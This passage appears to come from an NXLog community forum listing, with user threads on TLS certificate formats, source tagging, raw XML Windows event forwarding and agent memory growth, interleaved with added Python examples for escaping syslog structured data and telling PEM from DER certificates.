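# RFC 5424 6.3.3: '"', '\' and ']' inside a PARAM-VALUE must be escaped with '\'.
_SD_ESCAPE = str.maketrans({'"': '\\"', '\\': '\\\\', ']': '\\]'})
# Control characters are permitted by the RFC but fatal on newline-delimited transports.
_CTRL = re.compile(r'[\x00-\x1f\x7f]')
# SD-NAME (SD-ID, PARAM-NAME): 1..32 printable US-ASCII chars, none of '=', SP, ']', '"'.
_BAD_NAME = re.compile(r'[^\x21-\x7e]|[=\]"]')


def _hex_escape(m) -> str:
    return '\\x%02x' % ord(m.group())


def escape_param_value(value: str) -> str:
    """RFC escapes first, then control characters, so the added backslashes stay intact."""
    return _CTRL.sub(_hex_escape, value.translate(_SD_ESCAPE))


def is_valid_sd_name(name: str) -> bool:
    return 0 < len(name) <= 32 and not _BAD_NAME.search(name)


def build_sd_element(sd_id: str, params: dict) -> str:
    """Render one SD-ELEMENT, refusing names the grammar does not allow."""
    for name in (sd_id, *params):
        if not is_valid_sd_name(name):
            raise ValueError('invalid SD-NAME: %r' % name)
    body = ' '.join('%s="%s"' % (k, escape_param_value(v)) for k, v in params.items())
    return '[%s %s]' % (sd_id, body)


def to_syslog_ietf(pri, ts, host, app, procid, msgid, sd_id, params, msg) -> str:
    """HEADER SP STRUCTURED-DATA SP MSG, with MSG given the same control-char treatment."""
    header = '<%d>1 %s %s %s %s %s' % (pri, ts, host, app, procid, msgid)
    return '%s %s %s' % (header, build_sd_element(sd_id, params), _CTRL.sub(_hex_escape, msg))


def frame_octet_counted(record: str) -> bytes:
    """RFC 6587 octet-counting: a length prefix makes an embedded LF harmless."""
    data = record.encode('utf-8')
    return ('%d ' % len(data)).encode('ascii') + data


def count_newline_framed(payload: str) -> int:
    """Number of records a newline-delimited receiver would see in `payload`."""
    return sum(1 for line in payload.split('\n') if line)


# Constructed sample modelled on the post's event (fields trimmed).
SAMPLE_PARAMS = {
    'EventID': '4663',
    'ObjectName': '\\Device\\HarddiskVolume5\\',
    'HandleId': '0x1054',
    'AccessList': '%%4416\r\n\t\t\t\t',  # the CR LF + tabs that split the record
    'AccessMask': '0x1',
    'ProcessName': 'C:\\Windows\\System32\\mstsc.exe',
}
HEADER_ARGS = (14, '2022-09-22T15:19:53Z', 'PC-1304', 'Microsoft-Windows-Security-Auditing', 4, '-')


def naive_record() -> str:
    """An emitter that copies values verbatim: the failure mode from the post."""
    body = ' '.join('%s="%s"' % kv for kv in SAMPLE_PARAMS.items())
    return '<14>1 2022-09-22T15:19:53Z PC-1304 Microsoft-Windows-Security-Auditing 4 - [NXLOG@14506 %s] object access' % body


def safe_record() -> str:
    return to_syslog_ietf(*HEADER_ARGS, 'NXLOG@14506', SAMPLE_PARAMS, 'object access')


if __name__ == '__main__':
    print(count_newline_framed(naive_record()), 'record(s) seen from the naive emitter')
    print(count_newline_framed(safe_record()), 'record(s) seen after escaping')
    print(frame_octet_counted(safe_record())[:60])
```

The `\xNN` rewrite is a convention, not part of RFC 5424; a receiver that wants the original bytes back has to know about it, whereas octet counting preserves the value untouched and is the safer choice when both ends speak TCP.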
TLS Syslog Cert Question - PEM vs CER
Hi all, we are cutting our NXLog Community version over to a new solution and are currently using .pem certificate files to encrypt syslog in the om_ssl module. The new system is using a .cer file for the certificate, and when cutting over an agent to reference the .cer rather than the .pem, it doesn't seem like the logs are being decrypted. I didn't see anything in the documentation indicating NXLog doesn't support .cer or only supports .pem, but I wanted to query the forum to see if anyone else experienced issues with setting the TLS to utilize .epm files for encrypted log forwarding. Thanks.

mwidesba
Replies: 1
View post »
mwidesba
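As an added example (not from the post, not NXLog code), this Python distinguishes PEM from DER by looking at the bytes rather than the file extension, and normalises either to PEM. The reason it matters: a `.cer` exported from Windows can be "Base-64 encoded X.509" (which is PEM text, often with CRLF line endings and sometimes with Bag Attributes above the marker) or "DER encoded binary X.509", while OpenSSL-based TLS stacks such as the ones behind NXLog's SSL modules expect PEM. The conversion uses the standard library's `ssl.DER_cert_to_PEM_cert` / `ssl.PEM_cert_to_DER_cert`. The certificate bytes below are constructed placeholders with a valid DER SEQUENCE header, not a real certificate, so the example checks encoding only, not validity.

```python
"""Tell PEM from DER by content, not by file extension, and normalise to PEM.

Added example, not NXLog code. FAKE_DER and FAKE_CER_TEXT are constructed placeholders
with a well-formed DER SEQUENCE header; they are not a real certificate, so this
checks encoding only, never validity.
"""
import base64
import re
import ssl

_PEM_BLOCK = re.compile(
    rb'-----BEGIN CERTIFICATE-----\r?\n(.*?)\r?\n-----END CERTIFICATE-----', re.S)


def _der_sequence_covers_buffer(data: bytes) -> bool:
    """Minimal DER check: SEQUENCE tag whose encoded length spans the whole buffer."""
    if len(data) < 2 or data[0] != 0x30:
        return False
    first = data[1]
    if first < 0x80:  # short-form length
        length, hdr = first, 2
    else:  # long-form: low 7 bits give the number of length bytes that follow
        n = first & 0x7f
        if n == 0 or n > 4 or len(data) < 2 + n:
            return False
        length, hdr = int.from_bytes(data[2:2 + n], 'big'), 2 + n
    return hdr + length == len(data)


def detect_format(data: bytes) -> str:
    """'pem', 'der' or 'unknown', decided from the bytes alone."""
    if _PEM_BLOCK.search(data):
        return 'pem'
    if _der_sequence_covers_buffer(data):
        return 'der'
    return 'unknown'


def extract_pem_certs(data: bytes) -> list:
    """Each CERTIFICATE block as LF-terminated PEM text; drops Bag Attributes, CRLF, BOM."""
    certs = []
    for m in _PEM_BLOCK.finditer(data):
        body = m.group(1).replace(b'\r', b'')
        certs.append(b'-----BEGIN CERTIFICATE-----\n' + body + b'\n-----END CERTIFICATE-----\n')
    return [c.decode('ascii') for c in certs]


def to_pem_bundle(data: bytes) -> str:
    """Normalise a certificate or CA bundle file to PEM, whatever its extension was."""
    fmt = detect_format(data)
    if fmt == 'pem':
        return ''.join(extract_pem_certs(data))
    if fmt == 'der':
        return ssl.DER_cert_to_PEM_cert(data)
    raise ValueError('neither PEM nor DER certificate data')


def pem_to_der(pem: str) -> bytes:
    return ssl.PEM_cert_to_DER_cert(pem)


# Constructed: a DER SEQUENCE holding 16 bytes; real certificates are far larger.
FAKE_DER = b'\x30\x82\x00\x10' + bytes(range(16))
# Constructed: the same bytes as a Windows-style Base-64 .cer with CRLF and Bag Attributes.
FAKE_CER_TEXT = (b'Bag Attributes\r\n    friendlyName: test\r\n'
                 b'-----BEGIN CERTIFICATE-----\r\n'
                 + base64.encodebytes(FAKE_DER).replace(b'\n', b'\r\n')
                 + b'-----END CERTIFICATE-----\r\n')


if __name__ == '__main__':
    print(detect_format(FAKE_DER), detect_format(FAKE_CER_TEXT))
    print(to_pem_bundle(FAKE_DER))
    print(len(extract_pem_certs(FAKE_CER_TEXT * 2)), 'certificates in bundle')
```

Counting the blocks that `extract_pem_certs` returns is a quick way to confirm that a CA bundle actually contains the intermediate as well as the root before pointing `CAFile` at it.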
Add on end of line
Hi, I have this config:

    <Input WarnLog>
        Module  im_file
        File    'C:\warnlog.txt'
    </Input>

    <Input SpamLog>
        Module  im_file
        File    'C:\spamlog.txt'
    </Input>

    <Output out>
        Module  om_udp
        Host    192.168.1.2
        Port    5555
    </Output>

    <Route 1>
        Path  WarnLog => out
    </Route>

    <Route 2>
        Path  SpamLog => out
    </Route>

Warnlog looks like this:

    16.09.2022 11:54:54 Update Updater: Switch modules type retval = 0x00005007 [NOT NEED] SYSTEM
    16.09.2022 11:54:54 Update Updater: retval = 0x5003, failures: 0, profile: aktualizacja, trigger: ConfigChange SYSTEM
    16.09.2022 11:54:54 Update Mirror: retval = 0x5003 SYSTEM

Spamlog:

    16.09.2022 12:07:24 some@address.com some@address.com RE: subject 16.09.2022 12:04:59 0 No rule classifies the email Retained H|RN=0;RNP=
    16.09.2022 12:12:24 some@address.com some@address.com RE: subject 16.09.2022 12:09:51 0 No rule classifies the email Retained H|RN=0;RNP=

Everything works fine, I see messages on my syslog server, but I don't know what type of message it is, from spamlog or from warnlog. How can I add something to the end of each line before sending to syslog? Or is there another way?

5ss0
Replies: 1
View post »
Klevin
Require Windows Event log in Raw XML Format
I am having trouble configuring NXLog Enterprise to forward the Windows Event log in the original raw XML format that is shown in the XML View in the Details tab. The required data is:

    <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
      <System>
        <Provider Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" Name="Microsoft-Windows-Security-Auditing"/>
        <EventID>4624</EventID>
        <Version>2</Version>
        <Level>Information</Level>
        <Task>Logon</Task>
        <Opcode>Info</Opcode>
        <Keywords>Audit Success</Keywords>
        <TimeCreated SystemTime="2022-09-15T07:25:38.254241000Z"/>
        <EventRecordID>6733</EventRecordID>
        <Correlation ActivityID="{9C53E768-C82B-0003-78E7-539C2BC8D801}"/>
        <Execution ProcessID="772" ThreadID="19980"/>
        <Channel>Security</Channel>
        <Computer>Redacted01</Computer>
        <Security/>
      </System>
      <EventData>
        <Data Name="SubjectUserSid">NT AUTHORITY\SYSTEM</Data>
        <Data Name="SubjectUserName">Redacted01$</Data>
        <Data Name="SubjectDomainName">WORKGROUP</Data>
        <Data Name="SubjectLogonId">0x3e7</Data>
        <Data Name="TargetUserSid">Redacted01\Redacted03</Data>
        <Data Name="TargetUserName">Redacted03</Data>
        <Data Name="TargetDomainName">Redacted01</Data>
        <Data Name="TargetLogonId">0x45b8d14</Data>
        <Data Name="LogonType">7</Data>
        <Data Name="LogonProcessName">User32 </Data>
        <Data Name="AuthenticationPackageName">Negotiate</Data>
        <Data Name="WorkstationName">Redacted01</Data>
        <Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
        <Data Name="TransmittedServices">-</Data>
        <Data Name="LmPackageName">-</Data>
        <Data Name="KeyLength">0</Data>
        <Data Name="ProcessId">0x438</Data>
        <Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
        <Data Name="IpAddress">Redacted02</Data>
        <Data Name="IpPort">0</Data>
        <Data Name="ImpersonationLevel">Impersonation</Data>
        <Data Name="RestrictedAdminMode">-</Data>
        <Data Name="TargetOutboundUserName">-</Data>
        <Data Name="TargetOutboundDomainName">-</Data>
        <Data Name="VirtualAccount">No</Data>
        <Data Name="TargetLinkedLogonId">0x0</Data>
        <Data Name="ElevatedToken">Yes</Data>
      </EventData>
    </Event>

The data I am currently receiving is the information in the General tab instead. I have applied the following configuration to convert the data to XML format:

    define ROOT C:\Program Files\nxlog

    Moduledir %ROOT%\modules
    CacheDir  %ROOT%\data
    Pidfile   %ROOT%\data\nxlog.pid
    SpoolDir  %ROOT%\data
    LogFile   %ROOT%\data\nxlog.log

    <Extension _syslog>
        Module  xm_syslog
    </Extension>

    <Extension _json>
        Module  xm_json
    </Extension>

    <Extension xml>
        Module  xm_xml
    </Extension>

    <Input in_win>
        Module  im_msvistalog
        Query   <QueryList>                                   \
                    <Query Id="0">                            \
                        <Select Path="Application">*</Select> \
                        <Select Path="System">*</Select>      \
                        <Select Path="Security">*</Select>    \
                    </Query>                                  \
                </QueryList>
        Exec    $Message = $EventXML; $log_type = $event_trace; to_xml();
    </Input>

    <Output out_win>
        Module  om_udp
        Host    192.168.108.201:514
    </Output>

    <Route 2>
        Path  in_win => out_win
    </Route>

However, I am not able to get the desired output. The data I am currently receiving is:

    09 15 2022 03:53:34 192.168.115.4 <USER:NOTE> <EventTime>2022-09-15 16:38:31</EventTime><Hostname>SOCJH-04.cryptogennepal.com</Hostname><Keywords>9232379236109516800</Keywords><EventType>AUDIT_SUCCESS</EventType><SeverityValue>2</SeverityValue><Severity>INFO</Severity><EventID>4624</EventID><SourceName>Microsoft-Windows-Security-Auditing</SourceName><ProviderGuid>{54849625-5478-4994-A5BA-3E3B0328C30D}</ProviderGuid><Version>2</Version><TaskValue>12544</TaskValue><OpcodeValue>0</OpcodeValue><RecordNumber>189928</RecordNumber><ExecutionProcessID>748</ExecutionProcessID><ExecutionThreadID>11540</ExecutionThreadID><Channel>Security</Channel><Message/><Category>Logon</Category><Opcode>Info</Opcode><SubjectUserSid>S-1-5-18</SubjectUserSid><SubjectUserName>SOCJH-04$</SubjectUserName><SubjectDomainName>CGN</SubjectDomainName><SubjectLogonId>0x3e7</SubjectLogonId><T

argetUserSid>S-1-5-21-1983202128-2021996171-226450221-1105</TargetUserSid><TargetUserName>srijan.kafle</TargetUserName><TargetDomainName>CGN</TargetDomainName><TargetLogonId>0x1e170ee</TargetLogonId><LogonType>7</LogonType><LogonProcessName>Negotiat</LogonProcessName><AuthenticationPackageName>Negotiate</AuthenticationPackageName><WorkstationName>SOCJH-04</WorkstationName><LogonGuid>{4eaf9196-9215-5425-4e8c-729f74b2f1ce}</LogonGuid><TransmittedServices>-</TransmittedServices><LmPackageName>-</LmPackageName><KeyLength>0</KeyLength><ProcessId>0x2ec</ProcessId><ProcessName>C:\Windows\System32\lsass.exe</ProcessName><IpAddress>-</IpAddress><IpPort>-</IpPort><ImpersonationLevel>%%1833</ImpersonationLevel><RestrictedAdminMode>-</RestrictedAdminMode><TargetOutboundUserName>-</TargetOutboundUserName><TargetOutboundDomainName>-</TargetOutboundDomainName><VirtualAccount>%%1843</VirtualAccount><TargetLinkedLogonId>0x0</TargetLinkedLogonId><ElevatedToken>%%1843</ElevatedToken><EventReceivedTime>2022-09-15 16:38:33</EventReceivedTime><SourceModuleName>in_win</SourceModuleName><SourceModuleType>im_msvistalog</SourceModuleType><log_type/></Event>

Requesting assistance/documentation to achieve the desired log format.

Srijan
Replies: 1
Klevin
Possible memory leak? - Windows Server 2012 R2 - NXLog EE
Hello all, Hoping someone will be able to pinpoint the issue we're experiencing. We have deployed the latest NXLog Enterprise Edition agents (nxlog-5.5.7535) on numerous Windows servers, including multiple domain controllers (DCs). We're running into an issue where the agents on two DCs have a continuous increase in RAM usage. No other servers experience this problem. Over multiple days the memory usage by the agent slowly increases to gigabytes. This will keep increasing, but we restart the agent and we're back at ~10MB of RAM usage. The DCs with this issue run Windows Server 2012 R2. There are newer DCs in place as well, running Windows Server 2022. These new DCs do not have this problem. Does anyone have an idea as to why this is happening? If you require further information, please let me know. All the DCs have the same agent template deployed on them, see below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<agent>
  <agentType>TEMPLATE</agentType>
  <global-config>
    <log-level>INFO</log-level>
    <is-log-to-file>true</is-log-to-file>
    <connection-mode>LISTEN_FROM</connection-mode>
    <connection-address>172.16.1.44</connection-address> <!-- IP address of NXlog Manager -->
    <connection-port>4041</connection-port>
    <verbatim></verbatim>
  </global-config>
  <route>
    <name>route1</name>
    <priority>0</priority>
    <module-route>
      <module-id>RIN</module-id>
    </module-route>
    <module-route>
      <module-id>eventlog</module-id>
    </module-route>
    <module-route>
      <module-id>dnsaudit</module-id>
    </module-route>
  </route>
  <module>
    <name>RIN</name>
    <module>om_tcp</module>
    <config xsi:type="module-connect-address-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <type>OUTPUT</type>
      <verbatim>Exec to_syslog_snare();</verbatim>
      <connect-address>172.16.1.43</connect-address> <!-- IP address of log collector -->
      <port>517</port> <!-- Port used to collect logs by collector. Traffic is syslog but we've opted to not use standard port 514 to facilitate easier splitting of collected logs. -->
      <output-format>LineBased</output-format>
    </config>
  </module>
  <module>
    <name>eventlog</name>
    <module>im_msvistalog</module>
    <config xsi:type="module-windows-vista-log-in-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <type>INPUT</type>
      <verbatim>&lt;QueryXML&gt; &lt;QueryList&gt; &lt;Query Id="0"&gt; &lt;Select Path="Security"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;Query Id="1"&gt; &lt;Select Path="Application"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;Query Id="2"&gt; &lt;Select Path="System"&gt;*&lt;/Select&gt; &lt;/Query&gt; &lt;/QueryList&gt; &lt;/QueryXML&gt;</verbatim>
      <savePosition>true</savePosition>
      <read-from-last-position>true</read-from-last-position>
      <query></query>
      <channel></channel>
      <remote>false</remote>
      <server></server>
      <user-name></user-name>
      <domain></domain>
      <password></password>
      <auth-method>Default</auth-method>
    </config>
  </module>
  <module>
    <name>dnsaudit</name>
    <module>im_etw</module>
    <config xsi:type="module-event-tracing-for-windows-in-config-mapping" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
      <type>INPUT</type>
      <verbatim></verbatim>
      <provider>Microsoft-Windows-DNSServer</provider>
      <level>Verbose</level>
    </config>
  </module>
</agent>

nervevector
Replies: 5
nervevector
Memory Consumption Is High
Hi Team, I installed the "nxlog-5.4.7313_aix_ppc.rpm" package on an AIX device, but nxlog is consuming nearly 500MB RAM. Can you please let me know how to reduce the resource consumption? I am getting the debug logs below; please suggest whether there is any issue.

-bash-4.3# /opt/nxlog/bin/nxlog -v
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'multiline' using xm_multiline
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module '_xml' using xm_xml
2022-08-25 16:12:59 DEBUG [CORE|main] module _xml has 1 exported functions
2022-08-25 16:12:59 DEBUG [CORE|main] registering function to_xml
2022-08-25 16:12:59 DEBUG [CORE|main] function 'to_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] module _xml has 5 exported procedures
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_xml
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_xml
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure to_xml
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'to_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_windows_eventlog_xml
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_windows_eventlog_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure parse_windows_eventlog_xml
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'parse_windows_eventlog_xml' registered
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'filein' using im_file
2022-08-25 16:12:59 DEBUG [CORE|main] module filein has 2 exported functions
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_name
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_name' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function record_number
2022-08-25 16:12:59 DEBUG [CORE|main] function 'record_number' registered
2022-08-25 16:12:59 DEBUG [CORE|main] module filein has 0 exported procedures
2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for filein
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'fim' using im_fim
2022-08-25 16:12:59 DEBUG [CORE|main] module fim has 1 exported functions
2022-08-25 16:12:59 DEBUG [CORE|main] registering function is_scanning
2022-08-25 16:12:59 DEBUG [CORE|main] function 'is_scanning' registered
2022-08-25 16:12:59 DEBUG [CORE|main] module fim has 1 exported procedures
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure start_scan
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'start_scan' registered
2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for fim
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module 'fileout' using om_tcp
2022-08-25 16:12:59 DEBUG [CORE|main] module fileout has 0 exported functions
2022-08-25 16:12:59 DEBUG [CORE|main] module fileout has 1 exported procedures
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure reconnect
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'reconnect' registered
2022-08-25 16:12:59 DEBUG [CORE|main] FlowControl enabled for fileout
2022-08-25 16:12:59 DEBUG [CORE|main] Setting up module '_fileop' using xm_fileop
2022-08-25 16:12:59 DEBUG [CORE|main] module _fileop has 12 exported functions
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_read
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_read' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_exists
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_exists' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_basename
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_basename' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_dirname
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_dirname' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_mtime
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_mtime' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_ctime
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_ctime' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_type
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_type' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_size
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_size' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_hash
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_hash' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function file_inode
2022-08-25 16:12:59 DEBUG [CORE|main] function 'file_inode' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function dir_temp_get
2022-08-25 16:12:59 DEBUG [CORE|main] function 'dir_temp_get' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering function dir_exists
2022-08-25 16:12:59 DEBUG [CORE|main] function 'dir_exists' registered
2022-08-25 16:12:59 DEBUG [CORE|main] module _fileop has 17 exported procedures
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_cycle
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_cycle' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_cycle
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_cycle' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_rename
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_rename' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_copy
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_copy' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_remove
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_remove' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_remove
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_remove' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_link
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_link' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_append
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_append' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_write
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_write' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_truncate
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_truncate' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_truncate
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_truncate' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chown
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chown' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chown
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chown' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_chmod
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_chmod' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure file_touch
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'file_touch' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure dir_make
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'dir_make' registered
2022-08-25 16:12:59 DEBUG [CORE|main] registering procedure dir_remove
2022-08-25 16:12:59 DEBUG [CORE|main] procedure 'dir_remove' registered
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] CONFIG: multiline
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote start
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] adding string [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [<]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [<] to [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [A]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [A] to [^<]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [u]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [u] to [^<A]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^<Au]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [i]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [i] to [^<Aud]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [t]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [t] to [^<Audi]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [R]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [R] to [^<Audit]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [e]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [e] to [^<AuditR]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [c]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [c] to [^<AuditRe]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [o]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [o] to [^<AuditRec]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [r]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [r] to [^<AuditReco]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^<AuditRecor]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [>]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [>] to [^<AuditRecord]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote end
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpmodifiers end with eof
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp literal
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] new regexp: /^<AuditRecord>/
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp declared at line 42, character 32 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] literal
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] parsed expression
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote start
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] adding string [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [<]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [<] to [^]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append slash
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [/] to [^<]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [A]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [A] to [^</]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [u]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [u] to [^</A]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^</Au]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [i]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [i] to [^</Aud]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [t]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [t] to [^</Audi]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [R]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [R] to [^</Audit]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [e]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [e] to [^</AuditR]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [c]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [c] to [^</AuditRe]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [o]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [o] to [^</AuditRec]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [r]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [r] to [^</AuditReco]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [d]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [d] to [^</AuditRecor]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp: append [>]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] appending [>] to [^</AuditRecord]
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpquote end
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexpmodifiers end with eof
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp literal
